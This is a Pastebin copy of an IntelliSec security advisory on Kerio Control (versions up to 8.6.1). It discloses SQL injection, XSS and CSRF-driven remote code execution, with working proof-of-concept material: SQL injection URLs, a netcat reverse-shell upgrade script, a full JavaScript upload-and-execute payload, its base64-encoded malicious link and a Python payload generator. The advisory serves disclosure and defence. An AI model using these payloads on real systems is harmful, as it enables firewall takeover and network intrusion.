API tools faq
paste
moften

IntelliSec Advisory - Multiple Vulnerabilities in Kerio Cont

moften
Oct 15th, 2015
285
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.26 KB | None | 0 0
raw download clone embed print report
  1. IntelliSec Security Advisory
  2.  
  3. ==============================================================================================
  4.  
  5. Title: Multiple Vulnerabilities in Kerio Control (Virtual Appliance)
  6.  
  7. Vulnerabilities: XSS, SQL Injection, Remote Code Execution through CSRF
  8.  
  9. Product: Kerio Control
  10. Homepage: http://www.kerio.com
  11. Affected Version: <= 8.6.1
  12. Fixed Version: 8.6.2 (partially fixed)
  13. Impact: critical
  14. Date: 2015-10-12
  15.  
  16. Author: Raschin Tavakoli | IntelliSec GmbH
  17. http://www.intellisec.at
  18. research@intellisec.at
  19.  
  20. Links: https://youtu.be/EzTI2WlGHb4
  21.  
  22. ===============================================================================================
  23.  
  24. Vendor description:
  25. ===================
  26.  
  27. Kerio Control is a unified threat management firewall developed by Kerio Technologies. It
  28. features intrusion prevention, content filtering, activity reporting, bandwidth management,
  29. and virtual private networking. Kerio Control runs Linux, providing network perimeter defense
  30. for small to medium organizations.
  31.  
  32. Vulnerabilities
  33. ===============
  34. 1. XSS with Anti-XSS-Filter bypass (nonauth area)
  35. 2. SQL Injection (non-admin area)
  36. 3. Remote Code Execution (admin area)
  37.  
  38. By chaining the vulnerabilities together in combination with user interaction, an attacker may
  39. gain full control over the firewall and the underlying network.
  40.  
  41.  
  42. Attack Scenario
  43. ===============
  44.  
  45. The first attack could be to trick non-admin users to follow a malicious link in order to trigger
  46. a CSRF exploit via the /nonauth/certificate.php script. The script may exploit the SQL Injection
  47. flaw in reports.php for example.
  48. Once able to query the database, sensitive data of the users can be transmitted back to the
  49. attacker. Information of interest could be for example the traffic usage of admin users and their
  50. top-visited webpages.
  51.  
  52. In the next attack, this information may be used to embed another CSRF exploit into one of
  53. the top-visited webpages. If the attacker succeeds and the exploit gets triggered by a visiting
  54. admin, arbitrary remote code execution will be gained.
  55.  
  56. ===============================================================================================
  57. 1. SQL Injection:
  58. ===============================================================================================
  59.  
  60. Description:
  61. ============
  62.  
  63. Kerio Control suffers from an SQL Injection flaw in the report.php script.
  64.  
  65. It is not necessary to use blind sql injection, as the output will be rendered into an image file.
  66. As the text in the image file has a fixed size, multiple union selects can be combined to render out
  67. multiple images containing the result text of the query.
  68.  
  69. In order to exploit the issue, a user has to be authenticated. For non-admin users, webreports
  70. have to be enabled.
  71.  
  72. This issue is fixed in 8.6.2
  73.  
  74. Proof of Concept:
  75. =================
  76.  
  77. GET /report.php?id=1'+OR+'1'%3d'1'%3b+-- HTTP/1.1
  78. Host: testbox:4081
  79. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
  80. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  81. Accept-Language: en-US,en;q=0.5
  82. Accept-Encoding: gzip, deflate
  83. Cookie: SESSION_CONTROL_WEBIFACE=c0fa6c207d812da1fce3e2ff2bc2e609948988a041f5a23adb64064a42010e6b;
  84. TOKEN_CONTROL_WEBIFACE
  85.  
  86. For example, to read out the admin's internal UUID number, the following union based sql injection
  87. can be used:
  88.  
  89. https://testbox:4081/report.php?start=16703, 0, 0) UNION SELECT 'x', 'Admin UUID: ' ||
  90. substring(cast( (select UUID from USER_LIST WHERE USERNAME='Admin') as varchar(256))
  91. from 1 for 14), REQUESTS FROM GET_ALL_TOP_WEBS_D(16703, 1) UNION SELECT 'y', substring(cast(
  92. (select UUID from USER_LIST WHERE USERNAME='Admin') as varchar(256)) from 15 for 40), '7'
  93. FROM GET_ALL_TOP_WEBS_D(16703, 1);+--+&end=16703&id=0'+OR+USERNAME='Admin';+--+
  94.  
  95. ========================
  96. 2. Cross Site Scripting
  97. ========================
  98.  
  99. Description:
  100. ============
  101.  
  102. The server parameter in the nonauth/certificate.php script suffers from an non persistent XSS
  103. vulnerability. The payload needs to be base64 encoded and will be decoded at runtime. That way
  104. it bypasses all Anti-XSS Filters of modern browsers, which increases the severity of this issue
  105. significantly.
  106.  
  107. The issue has been tested with OS X Chrome Version 45.0.2454.101, OS X Safari Version 9.0
  108. (10601.1.56.2), Linux Chromium Version 37.0.2062.120 and Linux Iceweasel 31.8.0
  109.  
  110. This issue is fixed in 8.6.2
  111.  
  112. ===============================================================================================
  113. 3. Remote Command Execution via File Upload
  114. ===============================================================================================
  115.  
  116. Description:
  117. ============
  118.  
  119. The Kerio Control upgrade function in the admin interface suffers from a RCE vulnerability.
  120. A malicious ssh script can be uploaded and executed with root privileges. This can be done by
  121. simply changing a tar file to the extension .img. If this tar file contains a upgrade.sh shell
  122. script, this script will be executed with root privileges.
  123.  
  124. Kerio did not provide a fix for the upgrade functionality yet.
  125.  
  126. The Kerio admin interface by itself does not provide a functionality to execute shell commands
  127. on the underlying Linux system nor a possibility to enable ssh. SSH is disabled by default and
  128. can only be enabled through the Kerio Console Application.
  129.  
  130. More, this issue becomes critical, if it is combined with an CSRF attack.
  131.  
  132. ========================================
  133. 4. Remote Command Execution through CSRF
  134. ========================================
  135.  
  136. Description:
  137. ============
  138.  
  139. If a user with an authenticated admin session can be tricked to follow a specially crafted link
  140. (containing the base64 encoded payload), complete control over the firewall can be gained.
  141.  
  142. Proof of Concept:
  143. =================
  144.  
  145. Create a Bash Script:
  146. ---------------------
  147. # cat upgrade.sh
  148. # #!/bin/bash
  149. # nc 10.0.0.2 5555 -e /bin/bash &
  150.  
  151. # tar czf upgrade.tar.gz *
  152. # mv upgrade.tar.gz upgrade.img
  153.  
  154. Open a netcat listener on the attacker's machine 10.0.0.2:
  155. ----------------------------------------------------------
  156. # nc -lvp 5555
  157.  
  158. Generate Javascript Payload (File Upload and Execution):
  159. --------------------------------------------------------
  160. <script>
  161. url='http://10.0.0.1:4081/admin';
  162. _token="";
  163. _file="";
  164. _id = "";
  165. function reqListener () {
  166. obj = JSON.parse(this.responseText);
  167. file = obj.result.fileUpload.name;
  168. id = obj.result.fileUpload.id;
  169. createIFrame(file, id);
  170. }
  171. function createIFrame(file, id) {
  172. iframe=document.createElement("iframe");
  173. iframe.src=url + "/constants.js.php";
  174. iframe.style.display = "none";
  175. iframe.sandbox="allow-scripts allow-same-origin";
  176. iframe.onload=function() {
  177. cookie = iframe.contentWindow.document.cookie;
  178. var re = new RegExp(name + "=([^;]+)");
  179. var value = re.exec(cookie);
  180. var token=(value != null) ? unescape(value[1]) : null;
  181. executeScript(file, id, token);
  182. }
  183. document.body.appendChild(iframe);
  184. }
  185. function executeScript(file, id, token) {
  186. _file = file;
  187. _id = id;
  188. _token = token;
  189. var xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url + "/api/jsonrpc/", true);
  190. xmlhttp.setRequestHeader("X-Token", token);
  191. xmlhttp.addEventListener("load", executeScript2);
  192. xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");
  193. xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
  194. xmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}}));
  195. }
  196. function executeScript2(file, token) {
  197. var xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url +"/api/jsonrpc/", true);
  198. xmlhttp.setRequestHeader("X-Token", _token);
  199. xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");
  200. xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
  201. xmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id }}));
  202. }
  203. var xhr = new XMLHttpRequest();
  204. xhr.open("POST", url + "/api/jsonrpc/upload/", true);
  205. xhr.addEventListener("load", reqListener);
  206. xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  207. xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  208. xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1038495162429835808207612951");
  209. xhr.withCredentials = true;
  210. var body = "-----------------------------1038495162429835808207612951\r\n" +
  211. "Content-Disposition: form-data; name=\"uploadImage\"; filename=\"upgrade.img\" \r\n" +
  212. "Content-Type: application/octet-stream\r\n" +
  213. "\r\n" +
  214. "\x1f\x8b\x08\x00\xe0\x6e\x02\x56\x00\x03\xed\xce\xb1\x0e\x82\x30\x10\xc6\xf1\xce\x3c\xc5\x19\x13\x37\xe1\x8a\x2d\x3e\x4f\x51\x22\x2e\x60\x5a\x78\x7f\xab\x83\x24\x0e\x3a\x11\x63\xf2\xff\xdd\xf0\x25\xf7\xdd\x70\xf3\xed\x12\xc3\xb9\x2b\x53\x6f\x56\xa3\x59\xe3\xdc\x33\xb3\xf7\x54\xf5\xce\xd8\xba\x51\x75\xcd\xf1\xe0\xf2\xde\x5a\x9f\x43\x74\xbd\x97\x16\x73\x9a\x42\x14\x31\x71\x1c\xa7\x4f\x77\xdf\xfa\x3f\xb5\xdd\x54\xed\x75\xa8\xda\x90\xfa\x62\x38\x89\xd5\xf2\x31\xb5\xf8\x4c\xf6\x9d\xbc\x5a\xd9\x15\xbf\xfe\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xb8\x03\x94\x67\x18\xfa\x00\x28\x00\x00\r\n" +
  215. "-----------------------------1038495162429835808207612951--\r\n";
  216. var aBody = new Uint8Array(body.length);
  217. for (var i = 0; i < aBody.length; i++)
  218. aBody[i] = body.charCodeAt(i);
  219. xhr.send(new Blob([aBody]));
  220. </script>
  221.  
  222. Base64 encode and craft malicous link:
  223.  
  224. https://testbox:4081/nonauth/certificate.php?server=PHNjcmlwdD4KdXJsPSdodHRwOi8vMTAuMC4wLjE6NDA4MS9hZG1pbic7Cl90b2tlbj0iIjsKX2Zp
  225. bGU9IiI7Cl9pZCA9ICIiOwpmdW5jdGlvbiByZXFMaXN0ZW5lciAoKSB7CglvYmogPSBKU09OLnBh
  226. cnNlKHRoaXMucmVzcG9uc2VUZXh0KTsKCWZpbGUgPSBvYmoucmVzdWx0LmZpbGVVcGxvYWQubmFt
  227. ZTsKCWlkID0gb2JqLnJlc3VsdC5maWxlVXBsb2FkLmlkOwoJY3JlYXRlSUZyYW1lKGZpbGUsIGlk
  228. KTsKfQpmdW5jdGlvbiBjcmVhdGVJRnJhbWUoZmlsZSwgaWQpIHsKCWlmcmFtZT1kb2N1bWVudC5j
  229. cmVhdGVFbGVtZW50KCJpZnJhbWUiKTsKCWlmcmFtZS5zcmM9dXJsICsgIi9jb25zdGFudHMuanMu
  230. cGhwIjsKCWlmcmFtZS5zdHlsZS5kaXNwbGF5ID0gIm5vbmUiOwoJaWZyYW1lLnNhbmRib3g9ImFs
  231. bG93LXNjcmlwdHMgYWxsb3ctc2FtZS1vcmlnaW4iOwoJaWZyYW1lLm9ubG9hZD1mdW5jdGlvbigp
  232. IHsKCQljb29raWUgPSBpZnJhbWUuY29udGVudFdpbmRvdy5kb2N1bWVudC5jb29raWU7CgkJdmFy
  233. IHJlID0gbmV3IFJlZ0V4cChuYW1lICsgIj0oW147XSspIik7CgkJdmFyIHZhbHVlID0gcmUuZXhl
  234. Yyhjb29raWUpOwoJCXZhciB0b2tlbj0odmFsdWUgIT0gbnVsbCkgPyB1bmVzY2FwZSh2YWx1ZVsx
  235. XSkgOiBudWxsOwoJCWV4ZWN1dGVTY3JpcHQoZmlsZSwgaWQsIHRva2VuKTsKCX0KCWRvY3VtZW50
  236. LmJvZHkuYXBwZW5kQ2hpbGQoaWZyYW1lKTsKfQpmdW5jdGlvbiBleGVjdXRlU2NyaXB0KGZpbGUs
  237. IGlkLCB0b2tlbikgewoJX2ZpbGUgPSBmaWxlOwoJX2lkID0gaWQ7CglfdG9rZW4gPSB0b2tlbjsK
  238. CXZhciB4bWxodHRwPW5ldyBYTUxIdHRwUmVxdWVzdCgpO3htbGh0dHAub3BlbigiUE9TVCIsIHVy
  239. bCArICIvYXBpL2pzb25ycGMvIiwgdHJ1ZSk7Cgl4bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgt
  240. VG9rZW4iLCB0b2tlbik7Cgl4bWxodHRwLmFkZEV2ZW50TGlzdGVuZXIoImxvYWQiLCBleGVjdXRl
  241. U2NyaXB0Mik7Cgl4bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgtUmVxdWVzdGVkLVdpdGgiLCAi
  242. WE1MSHR0cFJlcXVlc3QiKTsKCXhtbGh0dHAuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBl
  243. IiwgImFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD1VVEYtOCIpOwoJeG1saHR0cC5zZW5kKEpTT04u
  244. c3RyaW5naWZ5KHsianNvbnJwYyI6IjIuMCIsImlkIjoxLCJtZXRob2QiOiJVcGRhdGVDaGVja2Vy
  245. LnVwbG9hZEltYWdlIiwicGFyYW1zIjp7ImZpbGVJZCI6IGZpbGV9fSkpOwp9CmZ1bmN0aW9uIGV4
  246. ZWN1dGVTY3JpcHQyKGZpbGUsIHRva2VuKSB7Cgl2YXIgeG1saHR0cD1uZXcgWE1MSHR0cFJlcXVl
  247. c3QoKTt4bWxodHRwLm9wZW4oIlBPU1QiLCB1cmwgKyIvYXBpL2pzb25ycGMvIiwgdHJ1ZSk7Cgl4
  248. bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgtVG9rZW4iLCBfdG9rZW4pOwoJeG1saHR0cC5zZXRS
  249. ZXF1ZXN0SGVhZGVyKCJYLVJlcXVlc3RlZC1XaXRoIiwgIlhNTEh0dHBSZXF1ZXN0Iik7Cgl4bWxo
  250. dHRwLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi9qc29uO2No
  251. YXJzZXQ9VVRGLTgiKTsKCXhtbGh0dHAuc2VuZChKU09OLnN0cmluZ2lmeSh7Impzb25ycGMiOiIy
  252. LjAiLCJpZCI6MSwibWV0aG9kIjoiVXBkYXRlQ2hlY2tlci5wZXJmb3JtQ3VzdG9tVXBncmFkZSIs
  253. InBhcmFtcyI6eyJpZCI6IF9pZCB9fSkpOwp9CnZhciB4aHIgPSBuZXcgWE1MSHR0cFJlcXVlc3Qo
  254. KTsKeGhyLm9wZW4oIlBPU1QiLCB1cmwgKyAiL2FwaS9qc29ucnBjL3VwbG9hZC8iLCB0cnVlKTsK
  255. eGhyLmFkZEV2ZW50TGlzdGVuZXIoImxvYWQiLCByZXFMaXN0ZW5lcik7Cnhoci5zZXRSZXF1ZXN0
  256. SGVhZGVyKCJBY2NlcHQiLCAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNh
  257. dGlvbi94bWw7cT0wLjksKi8qO3E9MC44Iik7Cnhoci5zZXRSZXF1ZXN0SGVhZGVyKCJBY2NlcHQt
  258. TGFuZ3VhZ2UiLCAiZW4tVVMsZW47cT0wLjUiKTsKeGhyLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRl
  259. bnQtVHlwZSIsICJtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0tLS0tLS0tLS0tLS0tLS0t
  260. LS0tLS0tLS0tLS0xMDM4NDk1MTYyNDI5ODM1ODA4MjA3NjEyOTUxIik7Cnhoci53aXRoQ3JlZGVu
  261. dGlhbHMgPSB0cnVlOwp2YXIgYm9keSA9ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTEw
  262. Mzg0OTUxNjI0Mjk4MzU4MDgyMDc2MTI5NTFcclxuIiArIAoiQ29udGVudC1EaXNwb3NpdGlvbjog
  263. Zm9ybS1kYXRhOyBuYW1lPVwidXBsb2FkSW1hZ2VcIjsgZmlsZW5hbWU9XCJ1cGdyYWRlLmltZ1wi
  264. IFxyXG4iICsgCiJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbVxyXG4iICsg
  265. CiJcclxuIiArIAoiXHgxZlx4OGJceDA4XHgwMFx4YWJceDZmXHgwMlx4NTZceDAwXHgwM1x4ZWRc
  266. eGNlXHhiMVx4MGVceDgyXHg0MFx4MTBceDg0XHhlMVx4YWJceDc5XHg4YVx4MzVceDI2XHg3Nlx4
  267. YzJceDFlXHhkZVx4MWRceGNmXHgwM1x4NGFceGM0XHgwNlx4Y2NceDFkXHhiY1x4M2ZceDY4XHgy
  268. MVx4ODlceDg1XHg1Nlx4YzRceDk4XHhmY1x4ZGZceDE2XHg1M1x4Y2NceDE2XHgzM1x4ZGRceGFm
  269. XHhiMVx4YmVceGI0XHg3OVx4ZWFceGNjXHg2Nlx4NzRceDExXHg5Y1x4N2JceGU2XHhlMlx4M2Rc
  270. eDU1XHhiZFx4MzNceGI2XHgwY1x4YWFceDJlXHg1NFx4YzFceDlmXHg4Y1x4NWFceGViXHg1ZFx4
  271. NjVceDQ0XHhiN1x4OWJceGI0XHg5YVx4ZDJceDU4XHg0N1x4MTFceDEzXHg4N1x4NjFceGZjXHhm
  272. NFx4ZjdceGFkXHhmZlx4NTNceGZiXHg1ZFx4ZDFceGRjXHhmYVx4YTJceGE5XHg1M1x4OTdceGY1
  273. XHg2N1x4YjFceDlhXHgzZlx4YWVceDE0XHhiZlx4OTBceDYzXHgyYlx4YWZceDU2XHgwZVx4ZDlc
  274. eGFmXHhiN1x4MDJceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4
  275. MDBceDAwXHg1Nlx4MzNceGNmXHhiMlx4M2JceDZjXHgwMFx4MjhceDAwXHgwMFxyXG4iICsgCiIt
  276. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTEwMzg0OTUxNjI0Mjk4MzU4MDgyMDc2MTI5NTEt
  277. LVxyXG4iOwp2YXIgYUJvZHkgPSBuZXcgVWludDhBcnJheShib2R5Lmxlbmd0aCk7CmZvciAodmFy
  278. IGkgPSAwOyBpIDwgYUJvZHkubGVuZ3RoOyBpKyspCmFCb2R5W2ldID0gYm9keS5jaGFyQ29kZUF0
  279. KGkpOyAKeGhyLnNlbmQobmV3IEJsb2IoW2FCb2R5XSkpOwo8L3NjcmlwdD4K
  280.  
  281.  
  282. Python 3 payload generator
  283. ==========================
  284. For easier testing, we developed a small python script that can be used to
  285. generate the payload:
  286.  
  287. #!/usr/bin/python
  288.  
  289. # ====================================================================== #
  290. # Title: Remote Command Execution through CSRF - Payload Generator #
  291. # Author: Raschin Tavakoli - IntelliSec GmbH #
  292. # Date: 12.10.2015 #
  293. # #
  294. # Description: #
  295. # This python3 script generates the payload to exploit the RCE via CSRF #
  296. # vulnerability in the Kerio Control Virtual Appliance. #
  297. # #
  298. # First a shell script will be packed as an Kerio upgrade.img file. Then #
  299. # a Javascript will be generated which uploads the file via the Kerio #
  300. # upgrade function. The payload will then be base64 encoded and can be #
  301. # injected into the server parameter of the #
  302. # nonauth/certificate.php script (). #
  303. # #
  304. # Example Usage: #
  305. # csrf-gen-payload.py -t https://10.0.0.8:4081/admin -l 10.0.0.7 -p 5555 #
  306. # ====================================================================== #
  307.  
  308. import os
  309. import shutil
  310. import base64
  311. import argparse
  312. import subprocess
  313. from optparse import OptionParser
  314. import codecs
  315. import sys
  316.  
  317. tmpdir = "/tmp/kerio_upgrade"
  318.  
  319. def usage():
  320. print ("\nUsage: csrf-gen-payload -f <file> -t <target-url> \n")
  321. print("Example: csrf-gen-payload.py -f upgrade.sh -t https://10.0.0.8:4081/admin \n")
  322. exit()
  323.  
  324. def main():
  325.  
  326. parser = OptionParser()
  327. parser.add_option("-f", "--file", dest="file",
  328. help="the bash file for remote execution", metavar="TARGET")
  329. parser.add_option("-t", "--target", dest="target_url",
  330. help="specify the target url", metavar="TARGET")
  331.  
  332. (options, args) = parser.parse_args()
  333.  
  334. file = options.file
  335. target_url = options.target_url
  336.  
  337. if not target_url or not file:
  338. usage()
  339.  
  340. # ====================================================================== #
  341. # Create upgrade.img file #
  342. # ====================================================================== #
  343. orgdir = os.path.dirname(os.path.realpath(__file__))
  344.  
  345. try:
  346. if os.path.exists(tmpdir):
  347. shutil.rmtree(tmpdir)
  348. except:
  349. print("Cannot clean " + tmpdir)
  350.  
  351. os.mkdir(tmpdir)
  352.  
  353. shutil.copy(file, tmpdir + os.path.sep + "upgrade.sh")
  354. os.chdir(tmpdir)
  355. os.system("tar czf upgrade.tar.gz *")
  356. src = os.path.join(tmpdir, "upgrade.tar.gz")
  357. dst = os.path.join(tmpdir, "upgrade.img")
  358. os.rename(src, dst)
  359.  
  360. f = open('upgrade.img', 'rb',)
  361. bin_data = f.read()
  362. f.close()
  363.  
  364. hexdata = "".join("\\x{:02x}".format(c) for c in bin_data)
  365.  
  366. # ====================================================================== #
  367. # Generate Javascript Payload #
  368. # ====================================================================== #
  369. script = ('<script>\n' +
  370. 'url=\'' + target_url +
  371. '\';\n' +
  372. '_token="";\n' +
  373. '_file="";\n' +
  374. '_id = "";\n' +
  375. 'function reqListener () {\n' +
  376. '\tobj = JSON.parse(this.responseText);\n' +
  377. '\tfile = obj.result.fileUpload.name;\n' +
  378. '\tid = obj.result.fileUpload.id;\n' +
  379. '\tcreateIFrame(file, id);\n' +
  380. '}\n' +
  381. 'function createIFrame(file, id) {\n' +
  382. '\tiframe=document.createElement("iframe");\n' +
  383. '\tiframe.src=url + "/constants.js.php";\n' +
  384. '\tiframe.style.display = "none";\n' +
  385. '\tiframe.sandbox="allow-scripts allow-same-origin";\n' +
  386. '\tiframe.onload=function() {\n' +
  387. '\t\tcookie = iframe.contentWindow.document.cookie;\n' +
  388. '\t\tvar re = new RegExp(name + "=([^;]+)");\n' +
  389. '\t\tvar value = re.exec(cookie);\n' +
  390. '\t\tvar token=(value != null) ? unescape(value[1]) : null;\n' +
  391. '\t\texecuteScript(file, id, token);\n' +
  392. '\t}\n' +
  393. '\tdocument.body.appendChild(iframe);\n' +
  394. '}\n' +
  395. 'function executeScript(file, id, token) {\n' +
  396. '\t_file = file;\n' +
  397. '\t_id = id;\n' +
  398. '\t_token = token;\n' +
  399. '\tvar xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url + "/api/jsonrpc/", true);\n' +
  400. '\txmlhttp.setRequestHeader("X-Token", token);\n' +
  401. '\txmlhttp.addEventListener("load", executeScript2);\n' +
  402. '\txmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");\n' +
  403. '\txmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");\n' +
  404. '\txmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}}));\n' +
  405. '}\n' +
  406. 'function executeScript2(file, token) {\n' +
  407. '\tvar xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url +"/api/jsonrpc/", true);\n' +
  408. '\txmlhttp.setRequestHeader("X-Token", _token);\n' +
  409. '\txmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");\n' +
  410. '\txmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");\n' +
  411. '\txmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id }}));\n' +
  412. '}\n' +
  413. 'var xhr = new XMLHttpRequest();\n' +
  414. 'xhr.open("POST", url + "/api/jsonrpc/upload/", true);\n' +
  415. 'xhr.addEventListener("load", reqListener);\n' +
  416. 'xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");\n' +
  417. 'xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");\n' +
  418. 'xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1038495162429835808207612951");\n' +
  419. 'xhr.withCredentials = true;\n' +
  420. 'var body = "-----------------------------1038495162429835808207612951\\r\\n" + \n' +
  421. '"Content-Disposition: form-data; name=\\"uploadImage\\"; filename=\\"upgrade.img\\" \\r\\n" + \n' +
  422. '"Content-Type: application/octet-stream\\r\\n" + \n' +
  423. '"\\r\\n" + \n' +
  424.  
  425. '"' + hexdata + '\\r\\n" + \n' +
  426.  
  427. '"-----------------------------1038495162429835808207612951--\\r\\n";\n' +
  428. 'var aBody = new Uint8Array(body.length);\n' +
  429. 'for (var i = 0; i < aBody.length; i++)\n' +
  430. 'aBody[i] = body.charCodeAt(i); \n' +
  431. 'xhr.send(new Blob([aBody]));\n' +
  432. '</script>')
  433.  
  434. print(script)
  435.  
  436. os.chdir(orgdir)
  437. shutil.rmtree(tmpdir)
  438.  
  439. if __name__ == '__main__':
  440. main()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!